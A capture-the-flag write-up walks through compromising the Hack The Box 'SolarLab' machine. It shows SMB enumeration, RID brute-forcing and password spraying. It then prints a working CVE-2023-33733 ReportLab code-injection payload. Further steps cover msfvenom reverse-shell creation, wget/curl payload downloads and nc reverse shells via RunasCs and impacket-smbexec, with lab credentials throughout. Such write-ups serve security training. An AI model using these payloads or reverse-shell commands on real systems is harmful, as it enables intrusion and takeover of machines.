Get in Touch

SolarLab HTB Writeup | HacktheBox

Introduction

In this post, You will learn how to CTF SolarLab from HTB and if you have any doubts comment down below 👇🏾

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on X.

Let’s Hack SolarLab HTB 😌

https://twitter.com/HacklikeHacker

SolarLab HTB Enumeration

As usual, we start by running the first nmap scan.

sudo nmap -sC -sV -O -A -oA 10.129.60.6_solarlab 10.129.60.6 -v
[sudo] password for gh0st256: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 00:41 EAT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:41
Completed NSE at 00:41, 0.00s elapsed
Initiating NSE at 00:41
Completed NSE at 00:41, 0.00s elapsed
Initiating NSE at 00:41
Completed NSE at 00:41, 0.00s elapsed
Initiating Ping Scan at 00:41
Scanning 10.129.60.6 [4 ports]
Completed Ping Scan at 00:41, 0.39s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:41
Completed Parallel DNS resolution of 1 host. at 00:41, 0.07s elapsed
Initiating SYN Stealth Scan at 00:41
Scanning 10.129.60.6 [1000 ports]
Discovered open port 445/tcp on 10.129.60.6
Discovered open port 80/tcp on 10.129.60.6
Discovered open port 139/tcp on 10.129.60.6
Discovered open port 135/tcp on 10.129.60.6
Discovered open port 6791/tcp on 10.129.60.6
Discovered open port 7680/tcp on 10.129.60.6
Completed SYN Stealth Scan at 00:42, 19.76s elapsed (1000 total ports)
Initiating Service scan at 00:42
Scanning 4 services on 10.129.60.6
Completed Service scan at 00:42, 33.11s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.129.60.6
Retrying OS detection (try #2) against 10.129.60.6
Initiating Traceroute at 00:42
Completed Traceroute at 00:42, 0.47s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:42
Completed Parallel DNS resolution of 2 hosts. at 00:42, 0.09s elapsed
NSE: Script scanning 10.129.60.6.
Initiating NSE at 00:42
Completed NSE at 00:43, 40.16s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 1.60s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.01s elapsed
Nmap scan report for 10.129.60.6
Host is up (0.38s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
80/tcp  open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
6791/tcp open  hnm
7680/tcp open  pando-pub
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|  date: 2024-05-11T19:xx:xx
|_  start_date: N/A
| smb2-security-mode:
|  3:1:1:
|_    Message signing enabled but not required


Host script results:
|_clock-skew: -1s
| smb2-security-mode:
|  3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|  date: 2024-05-11T19:xx:xx
|_  start_date: N/A

Recon on SMB:

        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents      Disk     
        IPC$            IPC      Remote IPC

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   452.14 ms 10.10.14.1
2   452.12 ms 10.129.60.6

NSE: Script Post-scanning.
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.76 seconds
           Raw packets sent: 2096 (96.146KB) | Rcvd: 45 (2.802KB)

We found a bunch of ports—80, 135, 139, 445, 6791, and 7680—but I focused on the smb shares. First off, I put the IP address in the ‘etc/hosts’ file along with the domain names for ports 80 (solarlab.htb) and 6791 (report.solarlab.htb). Now, let’s dig deeper. Time to check out the website on port 80.

After that, I went ahead and tried to access ‘report.solarlab.htb:6791/’.

However, even after trying different injections, none of them worked. So, to move forward, I realized I needed valid credentials and decided to check out other ports. I turned my attention to port 445 and started looking around by using the ‘guest’ account once more to access the shares.

crackmapexec smb solarlab.htb -u Guest -p "" --shares
SMB         solarlab.htb    445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         solarlab.htb    445    SOLARLAB         [+] solarlab\Guest: 
SMB         solarlab.htb    445    SOLARLAB         [+] Enumerated shares
SMB         solarlab.htb    445    SOLARLAB         Share           Permissions     Remark
SMB         solarlab.htb    445    SOLARLAB         -----           -----------     ------
SMB         solarlab.htb    445    SOLARLAB         ADMIN$                          Remote Admin
SMB         solarlab.htb    445    SOLARLAB         C$                              Default share
SMB         solarlab.htb    445    SOLARLAB         Documents       READ            
SMB         solarlab.htb    445    SOLARLAB         IPC$            READ            Remote IPC

It’s important to mention that the ‘Guest’ account not only lets us look around but also gives us read access to the ‘Documents’ share and the ‘IPC$’ service. This gives us a chance to explore the system further.

smbclient //solarlab.htb/Documents -U Guest

When I checked the details-file.xlsx, here’s what I found:

Now that we’ve got the passwords, our next move is to try a brute force attack on the Relative Identifiers (RIDs) using the ‘anonymous’ account.

This way, we can try to find any possible usernames linked to those RIDs. After that, we’ll test these usernames along with the passwords we found to see if we get any matches.

crackmapexec smb solarlab.htb -u anonymous -p '' --rid-brute
SMB         solarlab.htb    445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         solarlab.htb    445    SOLARLAB         [+] solarlab\anonymous: 
SMB         solarlab.htb    445    SOLARLAB         [+] Brute forcing RIDs
SMB         solarlab.htb    445    SOLARLAB         500: SOLARLAB\Administrator (SidTypeUser)
SMB         solarlab.htb    445    SOLARLAB         501: SOLARLAB\Guest (SidTypeUser)
SMB         solarlab.htb    445    SOLARLAB         503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB         solarlab.htb    445    SOLARLAB         504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB         solarlab.htb    445    SOLARLAB         513: SOLARLAB\None (SidTypeGroup)
SMB         solarlab.htb    445    SOLARLAB         1000: SOLARLAB\blake (SidTypeUser)
SMB         solarlab.htb    445    SOLARLAB         1001: SOLARLAB\openfire (SidTypeUser)

After finding these results, we notice a user we’re familiar with named ‘Blake,’ as mentioned in the earlier file (shown in the image).

Also, we spot another possibly important user account, ‘Openfire,’ which could be handy for our penetration testing. But our main focus is still on the ‘Administrator’ account.

Next up, we’ll try a brute force attack on the user account ‘Blake’ using the passwords we found. We’ll go through each password one by one to see if any of them let us authenticate successfully.

crackmapexec smb solarlab.htb -u blake -p pass.txt

Awesome! We’ve got the credentials for the user ‘blake’: Username: blakeb Password: ThisCanB3typedeasily1@

Now, let’s log in to port 6791 using these credentials.

Alright, let’s fire up BurpSuite and start exploring the website to find a way in.

After a bit of Googling on how to get Remote Code Execution in ReportLabs, I stumbled upon documentation about a public CVE proof of Concept (CVE-2023–33733).

Basically, because there aren’t enough checks in the ‘rl_safe_eval’ function, we can inject malicious code into an HTML file. Later on, this file gets converted to PDF using software that relies on the ReportLab library. The tricky part is that the whole malicious code has to be run with eval in just one expression.

Now, let’s go ahead and generate a PDF by clicking on ‘Training request’.

Sure, let’s click on ‘Generate PDF’ while intercepting the request with BurpSuite.

Before we add the malicious code to set up a reverse shell, let’s kick off a listener using netcat. But I like to use rlwrap along with netcat to make sure we have a smoother and more interactive shell experience right from the start. Here’s how to set it up:

rlwrap -cAr nc -lvnp 6565

Once you’ve got the listener set up, make a note of your IP address. Now, let’s craft a malicious payload using an online tool called ‘Online — Reverse Shell Generator.’

We’ll copy the PowerShell #3 base64 payload, like shown in the image, and tweak it by replacing the IP address and port number (in this case, 6565) with the right values matching your listener setup.

Next step is to blend the crafted payload into the malicious code, which we’ll send via Burp Suite.

Replace the ‘payload_from_rev_shell’ placeholder with the actual payload we got from the ‘Online — Reverse Shell Generator,’ making sure it’s in base64 format. Once the code is modified, send it through Burp Suite for execution.

<para>
    <font color="[ [ getattr(pow,Attacker('__globals__'))['os'].system('payload_from_rev_shell') for Attacker in [orgTypeFun('Attacker', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">
    exploit
    </font>
</para>

Once we intercept the request in Burp Suite, we swap out the data with the ‘training_request’ parameter. This swap lets us inject the modified code into the request, just like shown in the image.

To inject our malicious code, we replace the placeholder ‘{ cybersecurity awareness }’ with our modified code. This swap lets us replace the original content with the payload, like shown in the example.

With the modified request set up, we can now forward it and wait for a response back at our listener. As shown in the image, we successfully receive a response from the user ‘blake,’ indicating a successful connection.

User

Now that we’ve established a connection as the user ‘blake,’ we can navigate to the directory ‘C:\Users\blake\Desktop’ and grab the user flag located at ‘user.txt.’ This file holds the necessary information to confirm our access as the authenticated user.

Moving forward, our next step is to enumerate the machine. For thorough enumeration, I usually use Metasploit.

We’ll upload a payload and set up a connection to a listener within Metasploit. This will enable us to take further actions and gather more information.

create payload with this command

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.xx.xx LPORT=6464 -a x64 -f exe -o shell6464.exe

To set up a PHP-based web server in the designated directory, you can use the following command:

php -S 0.0.0.0:8080

This command will start a PHP web server on port 8080, serving files from the current directory.

To download files from the remote host, you can use various methods depending on the situation. If you have command execution capabilities on the remote host, you might use tools like wget or curl to fetch files from your PHP server. For example:

wget http://your_server_ip:8080/payload.exe

Replace “your_server_ip” with the IP address of your PHP server and adjust the path if needed. Similarly, you can use curl:

curl -O http://your_server_ip:8080/payload.exe

These commands will download the “payload.exe” file from your PHP server to the current directory on the remote host.

To run the shell and establish a connection to your Metasploit listener running on port 6464, you can execute the payload you downloaded. For example, if the payload is named “payload.exe,” you can run it on the target system. Once the payload is executed, it will connect back to your Metasploit listener.

If you’re using Meterpreter, you can use the following command in Metasploit to handle the incoming connection:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST your_listener_ip
set LPORT 6464
exploit

Replace “your_listener_ip” with the IP address where your Metasploit listener is running. This will handle the incoming connection from the payload and give you a Meterpreter shell.

It seems like we’ve received the connection in Metasploit. Now you can interact with the session to execute commands, gather information, or perform other actions on the target system.

Downloading and examining the SQL database file located at ‘C:\Users\blake\Documents\app\instance\users.db,’ I find the following information:

With the passwords obtained from the SQL database, we can now switch to the ‘openfire’ user. Since the ‘blake’ account couldn’t enumerate the ‘openfire’ folder, switching to the ‘openfire’ user is necessary to continue our penetration testing activities.

SolarLab HTB Root

To proceed further, we’ll upload the ‘runascs’ file. This file is essential for executing privileged commands and escalating our privileges within the system, as shown below:

With the successful upload of the ‘runascs’ file, we can now obtain a shell with the ‘openfire’ user using the credentials ‘openfire:HotP!fireguard.’ To improve our connectivity, we can also upload Netcat, which will assist in establishing a more reliable connection for further operations.

Moving forward, we’ll use the combination of ‘runcs’ and Netcat (nc) to create another shell as the ‘openfire’ user. This will allow us to execute commands and carry out various actions within the system using the privileges associated with the ‘openfire’ account.

.\RunasCs.exe openfire HotP!fireguard "C:\tmp\nc.exe 10.10.14.51 6363 -e powershell"

Always keep the listener active to ensure continuous communication and control over the system.

Let’s continue with further enumerations. During this process, we come across a script containing admin credentials for Openfire. We proceed to read the file to gather more information.

Now, we’ll decrypt the password using a tool specifically designed to decrypt Openfire passwords.

Awesome! Now that we’ve got the Administrator password, which is ‘xxxxxxxxx,’ we have several options to proceed. We can either use ‘runascs’ as we did before to obtain a shell as the Administrator, or we can leverage ‘impacket-smbexec’ for privilege escalation. Additionally, we can employ ‘chisel’ for tunneling and combine it with ‘evil-winrm’ for further access.

Let’s kick things off with the ‘runascs’ method. Before executing the command, make sure you have a listener open on the desired port, in this case, port 5454.

.\RunasCs.exe Administrator ThisPasswordShouldDo!@ "C:\tmp\nc.exe 10.10.14.51 5454 -e powershell"

Fantastic! It looks like we’ve received a reply back in the listener as the Administrator. Now we have full access to the system with escalated privileges, giving us ample control to carry out further actions and achieve our penetration testing objectives.

If we opt for using impacket-smbexec for privilege escalation instead, we’ll have to execute the appropriate commands to leverage this tool. After obtaining the Administrator credentials, we can use impacket-smbexec to execute commands remotely on other systems within the network.

Once executed, we can expect a response back in the terminal, indicating successful execution of the specified commands on the target system as the Administrator. This approach provides an alternative method for gaining control over systems and expanding our reach within the network.

impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb

Conclusion

In conclusion, the SolarLab box provided an engaging penetration testing challenge, requiring thorough reconnaissance and exploitation techniques. Through meticulous enumeration, exploitation of vulnerabilities like remote code execution, and strategic privilege escalation, we gained control over the system as the Administrator.

Leveraging tools such as ‘runascs’ for elevation, ‘impacket-smbexec’ for lateral movement, and ‘evil-winrm’ for remote access, alongside secure tunneling with ‘chisel’, we demonstrated adaptability and skill in navigating complex security environments.

This experience reinforced the importance of comprehensive enumeration, effective exploitation, and methodical privilege escalation in penetration testing engagements, enhancing our understanding of network security principles and real-world threat mitigation strategies.

Also Read: Return HTB

You may also like